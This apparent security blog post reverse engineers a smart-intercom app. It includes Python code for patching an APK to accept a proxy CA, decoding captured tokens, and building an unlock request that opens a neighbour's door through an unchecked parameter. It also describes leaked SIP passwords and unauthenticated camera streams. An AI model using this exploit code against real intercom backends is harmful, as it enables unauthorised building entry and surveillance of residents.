Sim-sim open, or reverse engineering a smart intercom

After reading a post by Krupnikas, I got the idea to try out mitmproxy and see how the backend of a mobile application I use every day is put together. The choice fell on my intercom app: once you log in, it lets you open doors and answer video calls. What came of this, and what holes I managed to find, I will tell below the cut.



Proxy settings


The usual approach to traffic analysis is a man-in-the-middle: with the analysed device on the same local network, its traffic first goes to a computer where it is decrypted and inspected, and is then re-encrypted and forwarded to the real server. The most popular tool for this is mitmproxy, and installing it is no big deal.

To see traffic from the phone, connect both the phone and the computer to your home wifi. Install mitmproxy on the computer and run it. In the phone's wifi settings, set the computer's local address and the mitmproxy port (8080 by default) as the proxy server. Then open mitm.it on the phone and install the mitmproxy CA certificate, which is what lets the proxy decrypt HTTPS. After these steps, requests from the browser became visible. Hooray! The next step, however, was a disappointment:


A Google search led to an open issue on GitHub. It turned out that, starting with Android 7.0 (API level 24), apps no longer trust user-installed CA certificates by default, so the app's TLS connections through the proxy simply fail. Fortunately, you can get around this by unpacking the APK, adding a network security config resource (res/xml/network_security_config.xml) with the following contents, and referencing it from AndroidManifest.xml via the android:networkSecurityConfig attribute on <application>. One caveat: <debug-overrides> only takes effect when the app is debuggable, so for a release build put the same trust-anchors under <base-config> instead:

<network-security-config>
    <debug-overrides>
        <trust-anchors>
            <!-- Trust preinstalled CAs -->
            <certificates src="system" />
            <!-- Additionally trust user added CAs -->
            <certificates src="user" />
        </trust-anchors>
    </debug-overrides>
</network-security-config>

Moreover, there is a ready-made script on GitHub that does this automatically. So: download the APK, run the patch script, install the result with adb install (a modified APK has to be re-signed first, otherwise the install is rejected), and voila, everything works.
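The same patch, written out as an added example (this is not the GitHub script the post refers to, nor the author's code). It assumes the APK has already been unpacked with apktool, and that you rebuild and re-sign it with apktool and apksigner afterwards; those steps are run separately and are not performed here. It deliberately uses <base-config> rather than the <debug-overrides> shown above, so that it also works on a non-debuggable release build. The manifest it creates for the offline run is constructed.

```python
"""Make an apktool-unpacked APK trust user-added CAs (e.g. the mitmproxy cert).

Added example, not the script mentioned in the post. Assumes the APK was unpacked
with `apktool d app.apk -o app_dir` and that you rebuild (`apktool b app_dir -o
patched.apk`) and re-sign with apksigner afterwards; those steps are not done here.
"""
import os
import sys
import tempfile
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NSC_ATTR = "{%s}networkSecurityConfig" % ANDROID_NS
CONFIG_NAME = "network_security_config"

# <base-config> rather than <debug-overrides>: Android honours debug-overrides
# only when the app is debuggable, so a release build would ignore them.
NETWORK_SECURITY_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config>
        <trust-anchors>
            <!-- Trust preinstalled CAs -->
            <certificates src="system" />
            <!-- Additionally trust user added CAs (the one installed via mitm.it) -->
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>
"""


def patch_apk_dir(apk_dir: str) -> str:
    """Write res/xml/network_security_config.xml and reference it from the manifest.

    Returns the android:networkSecurityConfig value now set on <application>.
    """
    xml_dir = os.path.join(apk_dir, "res", "xml")
    os.makedirs(xml_dir, exist_ok=True)
    with open(os.path.join(xml_dir, CONFIG_NAME + ".xml"), "w", encoding="utf-8") as fh:
        fh.write(NETWORK_SECURITY_CONFIG)

    manifest = os.path.join(apk_dir, "AndroidManifest.xml")
    ET.register_namespace("android", ANDROID_NS)  # keep 'android:' instead of 'ns0:' on write
    tree = ET.parse(manifest)
    application = tree.getroot().find("application")
    if application is None:
        raise ValueError("no <application> element in " + manifest)
    application.set(NSC_ATTR, "@xml/" + CONFIG_NAME)
    tree.write(manifest, encoding="utf-8", xml_declaration=True)
    return application.get(NSC_ATTR)


def manifest_trusts_user_cas(apk_dir: str) -> bool:
    """Does the manifest point at a config whose <base-config> trusts user CAs?
    Use this after rebuilding to confirm the patch actually took."""
    tree = ET.parse(os.path.join(apk_dir, "AndroidManifest.xml"))
    application = tree.getroot().find("application")
    ref = application.get(NSC_ATTR) if application is not None else None
    if not ref or not ref.startswith("@xml/"):
        return False
    cfg_path = os.path.join(apk_dir, "res", "xml", ref[len("@xml/"):] + ".xml")
    if not os.path.exists(cfg_path):
        return False
    cfg = ET.parse(cfg_path).getroot()
    return cfg.find("base-config/trust-anchors/certificates[@src='user']") is not None


# Constructed stand-in for an unpacked APK so the patch can be exercised offline.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.intercom">
    <application android:label="Intercom" android:debuggable="false">
        <activity android:name=".MainActivity" />
    </application>
</manifest>
"""


def make_sample_apk_dir() -> str:
    """Create a temp directory holding only the constructed manifest above."""
    apk_dir = tempfile.mkdtemp(prefix="apk_")
    with open(os.path.join(apk_dir, "AndroidManifest.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_MANIFEST)
    return apk_dir


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_apk_dir()
    print("set android:networkSecurityConfig =", patch_apk_dir(target))
    print("trusts user CAs:", manifest_trusts_user_cas(target), "in", target)
```

Run it with the apktool output directory as the only argument, then rebuild and sign; without an argument it patches the constructed sample manifest in a temp directory so you can inspect the result.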

Traffic analysis


We see that requests go to addresses of the form:

https://{intercom-company-url}/api/

Two headers are sent with every request:

api-version: 2
authorization: Bearer your.jwt.token

The first is the API version, the second the authorization token. Authorization uses a JSON Web Token, which consists of three base64url-encoded parts separated by dots: header, payload and signature.
Decode it (without checking the signature) with the command:

pyjwt decode --no-verify your.jwt.token

and see that the payload contains account_id and exp. The exp field is the token's expiry time (a Unix timestamp). Nothing in the token binds it to a device, so one account can hold valid tokens on several devices, and a token copied from the phone works just as well from a script until it expires.
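The same decoding done in Python with only the standard library, as an added example (not from the original post). The token below is constructed: its header and payload have the shape the post describes, its signature part is a dummy, and none of it is verified, which is exactly why this must only ever be used to inspect a captured token and never to trust one.

```python
"""Decode a JWT without verifying its signature, using only the standard library.

Added example, not from the original post. SAMPLE_TOKEN is constructed: header
{"alg":"HS256","typ":"JWT"}, payload {"account_id":12345,"exp":1700000000},
and a dummy signature segment.
"""
import base64
import json
import time
from datetime import datetime, timezone
from typing import Optional, Tuple

SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJhY2NvdW50X2lkIjoxMjM0NSwiZXhwIjoxNzAwMDAwMDAwfQ."
    "Zm9vYmFy"  # dummy signature: never checked by this script
)


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop the base64 '=' padding; restore it before decoding.
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Return (header, claims) of a compact JWS WITHOUT checking the signature.

    Same idea as `pyjwt decode --no-verify`: fine for looking at a captured
    token, never for authenticating anyone.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected three dot-separated parts")
    header_b64, payload_b64, _signature_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    claims = json.loads(_b64url_decode(payload_b64))
    return header, claims


def exp_datetime(claims: dict) -> datetime:
    """exp is a NumericDate: seconds since the Unix epoch, in UTC."""
    return datetime.fromtimestamp(claims["exp"], tz=timezone.utc)


def is_expired(claims: dict, now: Optional[float] = None) -> bool:
    """True once the current time reaches exp; a token without exp never expires."""
    if "exp" not in claims:
        return False
    now = time.time() if now is None else now
    return now >= claims["exp"]


if __name__ == "__main__":
    hdr, body = decode_unverified(SAMPLE_TOKEN)
    print("header :", hdr)
    print("claims :", body)
    print("expires:", exp_datetime(body).isoformat(), "expired now:", is_expired(body))
```

Paste a token captured in mitmproxy in place of SAMPLE_TOKEN to see how long the backend lets a stolen bearer token live; an expiry months away, with no device binding, is the kind of thing worth flagging.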

The most interesting requests for us are the list of available intercoms and door opening. Sending a GET request (I used Python and the requests library) to

https://{intercom-company-url}/api/customers/properties/{account_id}/intercoms

returns JSON with a list of intercoms and the following fields:

[
    {
        "id": ID,
        "mode": MODE,
        "sip_account": {"ex_user": USER_ID, "proxy": PROXY, "password": PSWD},
        "video": [{"quality": "low", "source": "rtsp://LINK"}]
    }
]

Here id is the intercom identifier; mode says which door this account is allowed to open (possible values are one_door, left_door and right_door); sip_account holds the intercom's SIP credentials; and video is a link to the camera stream. Wow!

Video calls through the intercom are made over the Session Initiation Protocol (SIP). The sip_account field hands us the SIP user IDs and passwords of every intercom our account has access to. Calling them directly does not work anyway, since the SIP proxy sits on an internal network. The video field, though, is interesting: it contains an externally reachable RTSP link to the camera stream, with no authentication of its own. Open VLC, paste the link, and you can watch the intercom camera around the clock. Handing out links like that is not good!

Next, let's figure out how the door is opened. When you press the open button, the application sends a GET request to:

https://{intercom-company-url}/api/customers/intercoms/{intercom_id}/unlock?door=left_door&id={intercom_id}

It turned out that the id query parameter is ignored entirely, while door is honoured exactly as sent: on an intercom with two doors you can open not only your own door but the neighbouring one as well, whichever you choose. The server never checks the requested door against the mode it returned for your account.
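The two calls above, listing intercoms and building the unlock request, as an added Python example (not the author's script). It uses only the standard library rather than requests so it runs offline: BASE_URL, the token, the account and intercom ids, and the SAMPLE_RESPONSE listing are placeholders or constructed, while the endpoint paths, the two headers and the door parameter are the ones documented above. The transport is injectable, so the same client code runs against the real backend or the fake one.

```python
"""Client for the intercom API endpoints described in the post.

Added example, not the author's code. BASE_URL, the token, the ids and
SAMPLE_RESPONSE are placeholders/constructed; the paths, the two headers and the
`door` query parameter are those the post documents.
"""
import json
from typing import Callable, Dict, List
from urllib.parse import urlencode
from urllib.request import Request, urlopen

BASE_URL = "https://intercom-company.example"   # stands in for {intercom-company-url}
DOORS = ("one_door", "left_door", "right_door")  # the `mode` values seen in the listing

Transport = Callable[[str, Dict[str, str]], str]


def api_headers(token: str) -> Dict[str, str]:
    """The two headers every request carries."""
    return {"api-version": "2", "authorization": "Bearer " + token}


def http_get(url: str, headers: Dict[str, str]) -> str:
    """Real transport: a plain GET returning the body as text (not used offline)."""
    with urlopen(Request(url, headers=headers)) as resp:
        return resp.read().decode("utf-8")


def list_intercoms(account_id: int, token: str, get: Transport = http_get) -> List[dict]:
    url = f"{BASE_URL}/api/customers/properties/{account_id}/intercoms"
    return json.loads(get(url, api_headers(token)))


def video_links(intercoms: List[dict]) -> Dict[int, List[str]]:
    """intercom id -> RTSP URLs. They come back as bare links: nothing in the
    JSON ties a link to the account or session that fetched it."""
    return {ic["id"]: [v["source"] for v in ic.get("video", [])] for ic in intercoms}


def unlock_url(intercom_id: int, door: str) -> str:
    """Build the unlock GET. The post found `id` ignored and `door` taken as sent,
    with no server-side check against the `mode` granted to the account."""
    if door not in DOORS:
        raise ValueError(f"unknown door {door!r}; expected one of {DOORS}")
    query = urlencode({"door": door, "id": intercom_id})
    return f"{BASE_URL}/api/customers/intercoms/{intercom_id}/unlock?{query}"


def unlock(intercom_id: int, door: str, token: str, get: Transport = http_get) -> str:
    return get(unlock_url(intercom_id, door), api_headers(token))


# --- Offline stand-in for the real backend ------------------------------------
# Constructed sample listing shaped like the JSON shown in the post; all values fake.
SAMPLE_RESPONSE = json.dumps([
    {"id": 101, "mode": "left_door",
     "sip_account": {"ex_user": "101-left", "proxy": "10.0.0.5", "password": "not-a-real-password"},
     "video": [{"quality": "low", "source": "rtsp://cam.example/101/low"}]},
    {"id": 202, "mode": "one_door",
     "sip_account": {"ex_user": "202", "proxy": "10.0.0.5", "password": "also-fake"},
     "video": [{"quality": "low", "source": "rtsp://cam.example/202/low"}]},
])
CALLS: List[dict] = []  # every request the fake transport has seen


def fake_get(url: str, headers: Dict[str, str]) -> str:
    """Records the request and answers with the listing or a canned unlock reply."""
    CALLS.append({"url": url, "headers": headers})
    if url.endswith("/intercoms"):
        return SAMPLE_RESPONSE
    if "/unlock?" in url:
        return json.dumps({"status": "ok"})  # constructed; the real reply is not shown in the post
    raise AssertionError("unexpected URL " + url)


if __name__ == "__main__":
    token = "header.payload.signature"  # paste a captured token here for real use
    intercoms = list_intercoms(12345, token, get=fake_get)
    for ic_id, links in video_links(intercoms).items():
        print(ic_id, links)
    # Opening the neighbour's door on a two-door intercom: only `door` changes.
    print(unlock_url(101, "right_door"))
```

To run it against the real backend, replace BASE_URL with the intercom company's host, pass a token captured in mitmproxy, and drop the get=fake_get argument so http_get is used. The thing to look at is how little the server verifies: the listing leaks unauthenticated RTSP links and SIP passwords, and unlock acts on whatever door value the client sends.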

Sim-sim open!


Having figured out the API, I decided to do something useful with it. The result is an Android application that listens for voice commands and, when it recognises a predefined phrase such as "sim-sim open", sends the request to open the corresponding door.

Findings


A smart intercom is good, but a safe and smart intercom is even better.
